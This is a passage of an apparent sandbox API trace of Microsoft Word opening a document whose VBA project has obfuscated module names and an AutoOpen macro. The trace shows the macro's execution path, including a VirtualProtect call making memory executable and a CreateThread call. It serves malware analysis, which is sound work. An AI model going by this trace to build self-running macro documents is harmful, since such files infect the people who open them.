Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x347f58 | out: ppvObject=0x347f58*=0x0) returned 0x80004002 [0059.809] IUnknown:Release (This=0x87ceab0) returned 0x4 [0059.813] wcscpy_s (in: _Destination=0x885ecc0, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0059.814] wcscpy_s (in: _Destination=0x884fa28, _SizeInWords=0x108, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0059.816] _wfullpath (in: _Buffer=0x3483cc, _Path="Normal", _BufferCount=0x104 | out: _Buffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop\\Normal") returned="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop\\Normal" [0059.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=-1, lpMultiByteStr=0x3486f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0059.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=-1, lpMultiByteStr=0x3486d0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0059.817] IsCharAlphaA (ch=84) returned 1 [0059.818] lstrlenA (lpString="ThisDocument") returned 12 [0059.819] CRetailMalloc_Realloc () returned 0x86e6108 [0059.819] CRetailMalloc_Realloc () returned 0x8842280 [0059.819] CRetailMalloc_Realloc () returned 0x8750280 [0059.819] CRetailMalloc_Realloc () returned 0x86e60d8 [0059.819] CRetailMalloc_Free () returned 0x1ba0101 [0059.819] CRetailMalloc_Alloc () returned 0x88116e0 [0059.819] CRetailMalloc_Realloc () returned 0x8769710 [0059.819] CRetailMalloc_Free () returned 0x6920101 [0059.820] CRetailMalloc_Alloc () returned 0x88a1228 [0059.821] CRetailMalloc_Alloc () returned 0x8750380 [0059.821] CRetailMalloc_Alloc () returned 0x87503a0 [0059.821] CRetailMalloc_Realloc () returned 0x87fc3e0 [0059.821] CRetailMalloc_Realloc () returned 0x86bada0 [0059.823] CRetailMalloc_Alloc () returned 0x888f048 [0059.823] CRetailMalloc_Free () returned 0x1 [0059.862] LoadTypeLib (in: szFile="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x348800*=0x0 | out: pptlib=0x348800*=0x87cef00) returned 0x0 [0059.862] IUnknown:QueryInterface (in: This=0x87cef00, riid=0x7503ca84*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x3484cc | out: ppvObject=0x3484cc*=0x0) returned 0x80004002 [0059.863] CRetailMalloc_Alloc () returned 0x876cb38 [0059.863] CRetailMalloc_Free () returned 0x1c0001 [0059.864] SysStringLen (param_1="Office") returned 0x6 [0059.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0059.864] SysStringLen (param_1="Office") returned 0x6 [0059.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x87fc354, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0059.865] CRetailMalloc_Alloc () returned 0x86f0078 [0059.865] CRetailMalloc_Free () returned 0x2170001 [0059.865] CRetailMalloc_Alloc () returned 0x8811708 [0059.865] CRetailMalloc_Realloc () returned 0x76dea20 [0059.865] CRetailMalloc_Free () returned 0xd4c0001 [0059.865] CRetailMalloc_Alloc () returned 0x889e420 [0059.865] CRetailMalloc_Free () returned 0x1 [0059.865] CRetailMalloc_Alloc () returned 0x889e420 [0059.865] CRetailMalloc_Free () returned 0x1 [0059.866] IUnknown:Release (This=0x87cef00) returned 0x2 [0059.866] CRetailMalloc_Alloc () returned 0x8769710 [0059.866] CRetailMalloc_Alloc () returned 0x8871788 [0059.866] CRetailMalloc_Alloc () returned 0x8811758 [0059.867] CRetailMalloc_Alloc () returned 0x87aa140 [0059.872] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0059.872] CRetailMalloc_Alloc () returned 0x8750420 [0059.872] qsort (in: _Base=0x8750420, _NumOfElements=0x5, _SizeOfElements=0x4, _PtFuncCompare=0x74ecde66 | out: _Base=0x8750420) [0059.872] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="B3BemS4", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 1 [0059.872] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="gR4WCf", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 1 [0059.872] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="xZvX7", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 3 [0059.873] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="SDWYuI6", cchCount1=-1, lpString2="xZvX7", cchCount2=-1) returned 1 [0059.873] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="B3BemS4", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 1 [0059.873] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="gR4WCf", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 1 [0059.873] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="SDWYuI6", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 1 [0059.873] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="B3BemS4", cchCount1=-1, lpString2="SDWYuI6", cchCount2=-1) returned 1 [0059.873] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="gR4WCf", cchCount1=-1, lpString2="SDWYuI6", cchCount2=-1) returned 1 [0059.873] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="B3BemS4", cchCount1=-1, lpString2="gR4WCf", cchCount2=-1) returned 1 [0059.873] bsearch (_Key=0x347ea0, _Base=0x8750420, _NumOfElements=0x5, _SizeOfElements=0x4, _PtFuncCompare=0x74ecde66) returned 0x875042c [0059.873] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ThisDocument", cchCount1=-1, lpString2="SDWYuI6", cchCount2=-1) returned 3 [0059.873] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ThisDocument", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 2 [0059.876] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="VBA", cchCount1=3, lpString2="Normal", cchCount2=6) returned 3 [0059.876] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="Word", cchCount1=4, lpString2="Normal", cchCount2=6) returned 3 [0059.876] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="stdole", cchCount1=6, lpString2="Normal", cchCount2=6) returned 3 [0059.876] wcscpy_s (in: _Destination=0x881170c, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0059.877] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="Normal", cchCount1=6, lpString2="Normal", cchCount2=6) returned 2 [0059.904] CRetailMalloc_Free () returned 0x6a00101 [0059.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78", cchWideChar=-1, lpMultiByteStr=0x9fc10a0, cbMultiByte=129, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78", lpUsedDefaultChar=0x0) returned 65 [0059.908] CRetailMalloc_Alloc () returned 0x8769640 [0059.908] CRetailMalloc_Alloc () returned 0x8811870 [0059.909] CRetailMalloc_Alloc () returned 0x87aa0c0 [0059.911] CRetailMalloc_Alloc () returned 0x8769508 [0059.911] CRetailMalloc_Alloc () returned 0x8811910 [0059.923] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="B3BemS4") returned 0x1078eb [0059.923] bsearch (_Key=0x347e80, _Base=0x8750420, _NumOfElements=0x5, _SizeOfElements=0x4, _PtFuncCompare=0x74ecde66) returned 0x8750420 [0059.923] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="B3BemS4", cchCount1=-1, lpString2="SDWYuI6", cchCount2=-1) returned 1 [0059.923] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="B3BemS4", cchCount1=-1, lpString2="B3BemS4", cchCount2=-1) returned 2 [0059.923] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="gR4WCf") returned 0x10f5f5 [0059.923] bsearch (_Key=0x347e80, _Base=0x8750420, _NumOfElements=0x5, _SizeOfElements=0x4, _PtFuncCompare=0x74ecde66) returned 0x8750424 [0059.923] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="gR4WCf", cchCount1=-1, lpString2="SDWYuI6", cchCount2=-1) returned 1 [0059.923] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="gR4WCf", cchCount1=-1, lpString2="B3BemS4", cchCount2=-1) returned 3 [0059.924] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="gR4WCf", cchCount1=-1, lpString2="gR4WCf", cchCount2=-1) returned 2 [0059.924] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="xZvX7") returned 0x10f382 [0059.924] bsearch (_Key=0x347e80, _Base=0x8750420, _NumOfElements=0x5, _SizeOfElements=0x4, _PtFuncCompare=0x74ecde66) returned 0x8750430 [0059.924] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="xZvX7", cchCount1=-1, lpString2="SDWYuI6", cchCount2=-1) returned 3 [0059.924] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="xZvX7", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 3 [0059.924] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="xZvX7", cchCount1=-1, lpString2="xZvX7", cchCount2=-1) returned 2 [0059.924] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="SDWYuI6") returned 0x100962 [0059.925] bsearch (_Key=0x347e80, _Base=0x8750420, _NumOfElements=0x5, _SizeOfElements=0x4, _PtFuncCompare=0x74ecde66) returned 0x8750428 [0059.925] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="SDWYuI6", cchCount1=-1, lpString2="SDWYuI6", cchCount2=-1) returned 2 [0059.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project.B3BemS4.AutoOpen", cchWideChar=-1, lpMultiByteStr=0x348820, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project.B3BemS4.AutoOpen", lpUsedDefaultChar=0x0) returned 25 [0059.946] strncpy_s (in: _Dst=0x8811898, _DstSize=0x1a, _Src="Project.B3BemS4.AutoOpen", _MaxCount=0x18 | out: _Dst="Project.B3BemS4.AutoOpen") returned 0x0 [0059.946] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Project") returned 0x10ae2d [0059.946] bsearch (_Key=0x3480a0, _Base=0x8750420, _NumOfElements=0x5, _SizeOfElements=0x4, _PtFuncCompare=0x74ecde66) returned 0x0 [0059.946] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Project", cchCount1=-1, lpString2="SDWYuI6", cchCount2=-1) returned 1 [0059.946] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Project", cchCount1=-1, lpString2="B3BemS4", cchCount2=-1) returned 3 [0059.946] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Project", cchCount1=-1, lpString2="gR4WCf", cchCount2=-1) returned 3 [0059.946] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Project", cchCount1=-1, lpString2="Project", cchCount2=-1) returned 2 [0059.946] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="B3BemS4") returned 0x1078eb [0059.946] bsearch (_Key=0x3480a0, _Base=0x8750420, _NumOfElements=0x5, _SizeOfElements=0x4, _PtFuncCompare=0x74ecde66) returned 0x8750420 [0059.946] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="B3BemS4", cchCount1=-1, lpString2="SDWYuI6", cchCount2=-1) returned 1 [0059.946] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="B3BemS4", cchCount1=-1, lpString2="B3BemS4", cchCount2=-1) returned 2 [0059.946] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="AutoOpen") returned 0x102ad9 [0059.954] CRetailMalloc_Realloc () returned 0x87fa700 [0059.954] CRetailMalloc_Realloc () returned 0x86bae90 [0059.955] ITypeLib:RemoteGetLibAttr (in: This=0x87ce888, ppTLibAttr=0x347e18, pDummy=0x348000 | out: ppTLibAttr=0x347e18, pDummy=0x348000*=0x0) returned 0x0 [0059.955] ITypeLib:RemoteGetDocumentation (in: This=0x87ce888, index=-1, refPtrFlags=0x347e14, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x348000 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x348000*=0x0) returned 0x0 [0059.955] CRetailMalloc_Realloc () returned 0x87cfe18 [0059.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchWideChar=72, lpMultiByteStr=0x347e64, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLLB", lpUsedDefaultChar=0x0) returned 72 [0059.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x347f6c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0059.955] CRetailMalloc_Realloc () returned 0x87d0040 [0059.956] IUnknown:AddRef (This=0x87ce888) returned 0x5 [0059.956] ITypeLib:LocalReleaseTLibAttr (This=0x87ce888) returned 0x8811708 [0059.956] IUnknown:Release (This=0x87ce888) returned 0x4 [0059.956] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0 [0059.956] ITypeLib:RemoteGetLibAttr (in: This=0x87ce660, ppTLibAttr=0x347e18, pDummy=0x348000 | out: ppTLibAttr=0x347e18, pDummy=0x348000*=0x0) returned 0x0 [0059.956] ITypeLib:RemoteGetDocumentation (in: This=0x87ce660, index=-1, refPtrFlags=0x347e14, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x348000 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x348000*=0x0) returned 0x0 [0059.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=64, lpMultiByteStr=0x347e64, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\MSWORD.OLBVBE7.DLL", lpUsedDefaultChar=0x0) returned 64 [0059.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x347f6c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0059.957] IUnknown:AddRef (This=0x87ce660) returned 0x9 [0059.957] ITypeLib:LocalReleaseTLibAttr (This=0x87ce660) returned 0x8811708 [0059.957] IUnknown:Release (This=0x87ce660) returned 0x8 [0059.957] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -5 [0059.957] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0 [0059.958] ITypeLib:RemoteGetLibAttr (in: This=0x87ceab0, ppTLibAttr=0x347e18, pDummy=0x348000 | out: ppTLibAttr=0x347e18, pDummy=0x348000*=0x0) returned 0x0 [0059.958] ITypeLib:RemoteGetDocumentation (in: This=0x87ceab0, index=-1, refPtrFlags=0x347e14, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x348000 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x348000*=0x0) returned 0x0 [0059.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", cchWideChar=31, lpMultiByteStr=0x347e64, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SysWOW64\\stdole2.tlbt Office\\Root\\Office16\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 31 [0059.958] CRetailMalloc_Alloc () returned 0x87d0268 [0059.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x347f6c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0059.958] IUnknown:AddRef (This=0x87ceab0) returned 0x6 [0059.958] ITypeLib:LocalReleaseTLibAttr (This=0x87ceab0) returned 0x8811708 [0059.958] IUnknown:Release (This=0x87ceab0) returned 0x5 [0059.958] CRetailMalloc_Realloc () returned 0x87fc200 [0059.959] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 2 [0059.959] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 2 [0059.959] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\CNormal") returned 4 [0059.960] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0 [0059.960] ITypeLib:RemoteGetLibAttr (in: This=0x87cef00, ppTLibAttr=0x347e18, pDummy=0x348000 | out: ppTLibAttr=0x347e18, pDummy=0x348000*=0x0) returned 0x0 [0059.960] ITypeLib:RemoteGetDocumentation (in: This=0x87cef00, index=-1, refPtrFlags=0x347e14, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x348000 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x348000*=0x0) returned 0x0 [0059.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchWideChar=69, lpMultiByteStr=0x347e64, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLLDLL", lpUsedDefaultChar=0x0) returned 69 [0059.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x347f6c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0059.960] IUnknown:AddRef (This=0x87cef00) returned 0x4 [0059.960] ITypeLib:LocalReleaseTLibAttr (This=0x87cef00) returned 0x88115f0 [0059.960] IUnknown:Release (This=0x87cef00) returned 0x3 [0059.961] CRetailMalloc_Free () returned 0xc320401 [0059.961] CRetailMalloc_Alloc () returned 0x87fc458 [0059.961] CRetailMalloc_Alloc () returned 0x8804580 [0059.961] CRetailMalloc_Realloc () returned 0x87d0490 [0059.961] CRetailMalloc_Free () returned 0x6170301 [0059.961] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="AutoOpen") returned 0x102ad9 [0059.961] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="AutoOpen", cchCount1=-1, lpString2="AutoOpen", cchCount2=-1) returned 2 [0059.961] CRetailMalloc_Free () returned 0x4300501 [0059.962] CRetailMalloc_Alloc () returned 0x87fc170 [0059.962] CRetailMalloc_Free () returned 0x6620301 [0059.966] CRetailMalloc_Alloc () returned 0x87fc170 [0059.966] CRetailMalloc_Free () returned 0x6620301 [0059.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x87cf3a2, dwSize=0xc) returned 1 [0059.968] VirtualProtect (in: lpAddress=0x87cf3a2, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x348374 | out: lpflOldProtect=0x348374*=0x4) returned 1 [0059.968] CRetailMalloc_Free () returned 0x2fa0001 [0059.969] DispCallFunc (pvInstance=0x0, oVft=0x87cf3a2, cc=0x4, vtReturn=0x0, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x347ed0) returned 0x0 [0059.969] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x74e211d3, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x347de0 | out: lpThreadId=0x347de0*=0xa90) returned 0x93c [0059.970] PeekMessageA (in: lpMsg=0x347dc0, hWnd=0x201ac, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x347dc0) returned 0 [0059.975] GetActiveWindow () returned 0x301b6 [0059.975] CRetailMalloc_Alloc () returned 0x86e5f88 [0059.992] CRetailMalloc_Realloc () returned 0x88421d0 [0059.993] CRetailMalloc_Realloc () returned 0x889e420 [0059.994] CoCreateGuid (in: pguid=0x347bf4 | out: pguid=0x347bf4*(Data1=0x366db4ff, Data2=0x1b29, Data3=0x412f, Data4=([0]=0xad, [1]=0x1d, [2]=0x25, [3]=0xa2, [4]=0x3d, [5]=0xc, [6]=0x3, [7]=0x3a))) returned 0x0 [0059.995] CoCreateGuid (in: pguid=0x347bf4 | out: pguid=0x347bf4*(Data1=0x76f7f897, Data2=0xd085, Data3=0x4dbf, Data4=([0]=0x93, [1]=0xe3, [2]=0x6f, [3]=0xc5, [4]=0x62, [5]=0xa, [6]=0xa4, [7]=0x10))) returned 0x0 [0059.995] CRetailMalloc_Alloc () returned 0x8750120 [0060.005] CRetailMalloc_Alloc () returned 0x883deb0 [0060.015] _mbscpy_s (in: _Dst=0x347ac8, _DstSizeInBytes=0xa, _Src=0x56e11ae | out: _Dst=0x347ac8) returned 0x0 [0060.015] CRetailMalloc_Realloc () returned 0x889e528 [0060.015] CRetailMalloc_Realloc () returned 0x87f68e8 [0060.016] CRetailMalloc_Realloc () returned 0x87504c0 [0060.016] CRetailMalloc_Alloc () returned 0x88422d8 [0060.016] IUnknown:QueryInterface (in: This=0x87ce888, riid=0x7503ca84*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x347664 | out: ppvObject=0x347664*=0x0) returned 0x80004002 [0060.017] ITypeLib:GetTypeComp (in: This=0x87ce888, ppTComp=0x347668 | out: ppTComp=0x347668*=0x87ce890) returned 0x0 [0060.017] CRetailMalloc_Alloc () returned 0x86bac50 [0060.017] IUnknown:AddRef (This=0x87ce890) returned 0x7 [0060.017] IUnknown:Release (This=0x87ce890) returned 0x6 [0060.017] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.017] IUnknown:QueryInterface (in: This=0x87ce660, riid=0x7503ca84*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x347664 | out: ppvObject=0x347664*=0x0) returned 0x80004002 [0060.017] ITypeLib:GetTypeComp (in: This=0x87ce660, ppTComp=0x347668 | out: ppTComp=0x347668*=0x87ce668) returned 0x0 [0060.017] CRetailMalloc_Alloc () returned 0x86baec0 [0060.017] IUnknown:AddRef (This=0x87ce668) returned 0xb [0060.017] IUnknown:Release (This=0x87ce668) returned 0xa [0060.017] IUnknown:Release (This=0x87ce660) returned 0x9 [0060.017] IUnknown:QueryInterface (in: This=0x87ceab0, riid=0x7503ca84*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x347664 | out: ppvObject=0x347664*=0x0) returned 0x80004002 [0060.017] ITypeLib:GetTypeComp (in: This=0x87ceab0, ppTComp=0x347668 | out: ppTComp=0x347668*=0x87ceab8) returned 0x0 [0060.018] CRetailMalloc_Alloc () returned 0x86baef0 [0060.018] IUnknown:AddRef (This=0x87ceab8) returned 0x8 [0060.018] IUnknown:Release (This=0x87ceab8) returned 0x7 [0060.018] IUnknown:Release (This=0x87ceab0) returned 0x6 [0060.020] CRetailMalloc_Alloc () returned 0x86baf20 [0060.020] IUnknown:QueryInterface (in: This=0x87cef00, riid=0x7503ca84*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x347664 | out: ppvObject=0x347664*=0x0) returned 0x80004002 [0060.020] ITypeLib:GetTypeComp (in: This=0x87cef00, ppTComp=0x347668 | out: ppTComp=0x347668*=0x87cef08) returned 0x0 [0060.020] CRetailMalloc_Alloc () returned 0x86baf50 [0060.020] IUnknown:AddRef (This=0x87cef08) returned 0x6 [0060.020] IUnknown:Release (This=0x87cef08) returned 0x5 [0060.020] IUnknown:Release (This=0x87cef00) returned 0x4 [0060.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48526be, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="uxCLeY") returned 7 [0060.020] CRetailMalloc_Alloc () returned 0x888f858 [0060.020] CRetailMalloc_Alloc () returned 0x8811988 [0060.020] CRetailMalloc_Alloc () returned 0x86e60f8 [0060.020] CRetailMalloc_Alloc () returned 0x86e60c8 [0060.021] CRetailMalloc_Alloc () returned 0x88119b0 [0060.021] CRetailMalloc_Alloc () returned 0x87ebc10 [0060.021] ITypeComp:RemoteBind (in: This=0x87ce890, szName="uxCLeY", lHashVal=0x10ff19, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x228 | out: ppTInfo=0x3475d0*=0x0, 